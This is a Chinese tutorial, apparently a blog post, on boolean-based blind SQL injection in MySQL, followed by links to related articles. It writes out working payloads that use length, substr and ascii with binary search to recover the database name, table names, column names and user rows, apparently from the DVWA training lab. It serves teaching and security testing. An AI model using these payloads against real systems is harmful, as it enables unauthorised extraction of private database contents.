布尔注入:

当我们在注入的过程中输入的语句在页面没有数据返回点,这就需要利用布尔型盲注一步步来猜取想要的数据。(盲注分为布尔盲注和时间盲注)

盲注常用函数:

length()  返回字符串的长度, 可以返回 数据库 表明 列名的 长度

substr()  截取字符串。subster(string, start, length)   字符串, 从第几位截取,截取长度是多少

ascil()  返回ascil码

基于时间盲注:

sleep(n)  将程序挂起一段时间,n为n秒

if(expr1,expr2,expr3)  if判断语句

布尔注入流程:

1.判断是否存在注入,字符型还是数字型。

2.猜解当前数据库长度 

  这个注入过程就相当于 输入者跟数据库进行对话

你问:  1' and length (database())=1 #  ( 这里猜测数据库名称为1个字符)

数据库回答:  missing

继续猜测 1‘and length(database())=4 # 当我们输入到4的时候 数据库返回用户id存在 数据库中 ,那么可得出数据库名称为4位

 猜名称    (二分法逐字猜解)

ascii码值: A到Z的ASCII码是65到90,a到z的ascii码值是97到122

首先,我们用二分法取中间数来猜取数据库名称的第一位字母

1' and ascii(substr(database(),1,1))>97 #

 显示存在,说明数据库的第一个字母是大于或等于97的,

1' and ascii(substr(database(),1,1))<122 #

继续使用二分法测试,发现小于122 

1' and ascii (substr(database(),1,1))<109 #

 测试发现小于109

1' and ascii (substr(database(),1,1))<102 #

 发现小于102继续测试

1' and ascii (substr(database(),1,1))<100 #

 发现报错了,这就说明 数据库名称<=100

1' and ascii (substr(database(),1,1))<=100 #

 数据库的第一位数字的ascii为100   即为d   

剩下三位 只需更改substr 的 第二个参数 即可 获取完整的数据库名称

 

3.猜解表名  (猜解表的数量)

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 #

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #

显示存在,说明 这个数据库里有 2个表

(猜解第⼀个表名长度)

1' and length (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #

显示第一个表名的这个长度不为1. 继续测试

1' and length (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 #

 不为2

.

.

.

1' and length (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #

这里显示猜出第一个表名的为9 

接下来只要更改limit 的参数(1.1) 即可猜解第二张表的长度。

 

猜解第一个表的名字

1' and ascii (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >97 #

通过二分法和猜解数据库名称一样,取猜解表名。

最后猜解表名为 guestbook users                              

猜解表的字段名 数量:

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 #

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 #

猜解第一个字段的长度

方法同猜解表名长度

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 #

猜解第一个字段名

1' and ascii(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1,1))>97 # 显⽰存在

猜解数据 

依然是使用二分法猜解数据

and ascii(substr((select user from dvwa.users limit 0,1),1,1))>96 #

MySQL手注之盲注(布尔)的更多相关文章

  1. MYSQL注入天书之盲注讲解

    Background-2 盲注的讲解 何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面.此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注.从ba ...

  2. SQL注入汇总(手注,盲注,报错注入,宽字节,二次编码,http头部){10.22、23 第二十四 二十五天}

    首先什么是SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. SQL注入有什么危害? 危害:数据泄露.脱库 ...

  3. mysql基于“时间”的盲注

    无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...

  4. sqli-labs less8-10(布尔盲注时间盲注)

    less-8 布尔盲注 首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹.然后进行盲注. 盲注思路: 破解当前数据库名: and len ...

  5. SQL注入--显注和盲注中过滤逗号绕过

    SQL注入逗号绕过 1.联合查询显注绕过逗号 在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联 ...

  6. sql注入--bool盲注,时间盲注

    盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...

  7. sqli-labs lesson5-6 布尔盲注 报错注入 延时注入

    LESSON 5: 典型的布尔盲注. 盲注:sql注入过程中,sql语句的执行结果不回显到前端,这个时候就只能用一些别的方法进行判断或者尝试,这个判断或者尝试就叫做盲注.盲注又分为:1.基于布尔SQL ...

  8. SQL注入----盲注总结

    参考文章:https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247490388&idx=1&sn=c677837d7 ...

  9. SQL盲注测试高级技巧

    写在前面: 这篇文章主要写了一些加快盲注速度的技巧和盲注中比较精巧的语句,虽然注入并不是什么新技术了.但是数据库注入漏洞依然困扰着每一个安全厂商,也鞭策着每一个安全从业者不断前进. 正文: 首先来简单 ...

随机推荐

  1. python字典的概念与基本操作

    字典是非常常用的一种数据结构,它与json格式的数据非常相似,核心就是以键值对的形式存储数据,关于Python中的字典做如下四点说明: 1.构造字典对象需要用大括号表示 {},每个字典元素都是以键值对 ...

  2. DOM 事件机制&事件委托

    一.事件机制 事件是在编程时系统内发生的动作或者发生的事情,系统会在事件出现的时候触发某种信号并且会提供一个自动加载某种动作的机制(来自MDN).每个事件都有事件处理器(有时也叫事件监听器),也就是触 ...

  3. Sublime Text3 个人使用安装设置

    1 安装Package Control 自动安装: 点击 View > Show Console 输入以下代码并运行 import urllib.request,os,hashlib; h = ...

  4. Nuxt.js 踩坑记录,(1)引入fs包报错

    今天又是码农的一天. 但是写着写着,不知道为啥就页面就报错了, 如图所示,我在db/app.js下引入了fs这个模块,提示我npm install,我也照做了,但是仍然报错. 通过各种百度,踩坑,最终 ...

  5. 基于id3算法根据房价数据进行画图预测python

    根据已给的波士顿房价数据,对波斯顿房价进行预测.即,实现给出若干条件(如房间数.社区的低收入阶层的比率和镇上学生与教师数量比例的部分数据),要能说出给出的条件是否能够有效进行预测,如可以做有效预测,则 ...

  6. “网络巨轮”BGP的高级装备(增强配置)

    引入 如下图在很多时候,BGP建立对等体的时候,要去建立大量的EBGP和IBGP对等体,IBGP还要全连接,这就给我们带来了大量重复的工作,路由表就会变得很庞大,区域内和区域之间就会很难管理,以下这些 ...

  7. 深度优先搜索(DFS)解题总结

    定义 深度优先搜索算法(Depth-First-Search),是搜索算法的一种.它沿着树的深度遍历树的节点,尽可能深的搜索树的分支. 例如下图,其深度优先遍历顺序为 1->2->4-&g ...

  8. 网络测速神器:SpeedTest深度指南

    最近在测试一个项目,里面涉及到一个测试case:在linux服务器上,当网络带宽较差时,观察服务的消息处理能力和表现.限制网卡带宽有许多方法,比如Wondershaper或者ethtool.那验证限速 ...

  9. layui 表单验证汇总

    1 表单自带校验 lay-verify:是表单验证的关键字有以下值供选择: required 必填项phone 手机号email 邮箱date 日期url 链接identity 身份证number 数 ...

  10. Pinpoint 一款强大的APM工具

    背景 程序的监控一直是程序员最头痛的事情之一,现网程序有问题怎么办?看进程看端口 top/free/df 三件套?网络抓包?看日志?所以为了满足这些初级需求很多公司都做了主机监控,进程端口监听等功能, ...